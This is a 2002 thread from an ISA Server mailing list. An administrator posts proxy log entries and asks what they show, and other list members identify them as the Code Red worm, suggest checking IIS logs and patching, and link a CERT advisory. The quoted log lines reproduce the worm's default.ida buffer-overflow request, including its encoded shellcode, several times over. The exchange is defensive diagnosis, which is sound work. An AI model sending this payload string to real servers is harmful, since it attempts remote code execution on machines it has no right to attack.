Tough crowd. I was under the assumption that most users subscribed here have been well aware of the Code Red exploit. My apolgies. My intentions were to point you in the right direction. Below is a link that goes over the exploit, and will give you some additional information. http://www.cert.org/advisories/CA-2001-19.html <http://www.cert.org/advisories/CA-2001-19.html> Dave -----Original Message----- From: Joseph [mailto:cismic@xxxxxxx] Sent: Tuesday, April 09, 2002 2:39 PM To: [ISAserver.org Discussion List] Subject: [isalist] RE: Log http://www.ISAserver.org What you need to look at are the IIS logs next to determine if the vCache 304 record allowed it access to your IIS machine. If your IIS machine has the latest service packs then, no you should not be affected. Joseph -----Original Message----- From: Craig A. Hansen [mailto:CHansen@xxxxxxxxxxxxx] Sent: Tuesday, April 09, 2002 11:38 AM To: [ISAserver.org Discussion List] Subject: [isalist] RE: Log http://www.ISAserver.org Is a server of mine infected or is getting blocked? Craig Hansen -----Original Message----- From: Ewing, David F. [mailto:dewing@xxxxxxxxxxxxxxxxxxx] Sent: Tuesday, April 09, 2002 1:35 PM To: [ISAserver.org Discussion List] Subject: [isalist] RE: Log http://www.ISAserver.org Nimda. -----Original Message----- From: Craig A. Hansen [mailto:CHansen@xxxxxxxxxxxxx] Sent: Tuesday, April 09, 2002 2:30 PM To: [ISAserver.org Discussion List] Subject: [isalist] Log http://www.ISAserver.org Does anyone no exactly what is happening here. Thanks, #Fields: c-ip cs-username c-agent date time s-computername cs-referred r-host r-ip r-port time-taken cs-bytes sc-bytes cs-protocol s-operation cs-uri s-object-source sc-status 216.93.16.114 anonymous - 4/7/2002 10:55:17 PROXY - <file://www.worm.com> www.worm.com - - 19078 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a VCache 304 208.246.141.116 anonymous - 4/7/2002 15:25:22 PROXY - <file://www.worm.com> www.worm.com - - 18578 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a VCache 304 200.178.163.35 anonymous - 4/7/2002 15:29:52 PROXY - <file://www.worm.com> www.worm.com - - 18328 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a VCache 304 61.242.154.155 anonymous - 4/7/2002 18:39:33 PROXY - <file://www.worm.com> www.worm.com - - 18672 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a Inet 200 200.68.3.26 anonymous - 4/7/2002 20:21:00 PROXY - <file://www.worm.com> www.worm.com - - 18844 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a VCache 304 200.67.7.199 anonymous - 4/7/2002 23:00:29 PROXY - <file://www.worm.com> www.worm.com - - 18406 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a VCache 304 61.157.84.32 anonymous - 4/7/2002 23:28:03 PROXY - <file://www.worm.com> www.worm.com - - 18937 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a VCache 304 202.105.86.209 anonymous - 4/7/2002 23:46:54 PROXY - <file://www.worm.com> www.worm.com - - 18375 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a VCache 304 Craig Hansen ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: dewing@xxxxxxxxxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub') ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: chansen@xxxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub') ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: cismic@xxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub') ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: dewing@xxxxxxxxxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub')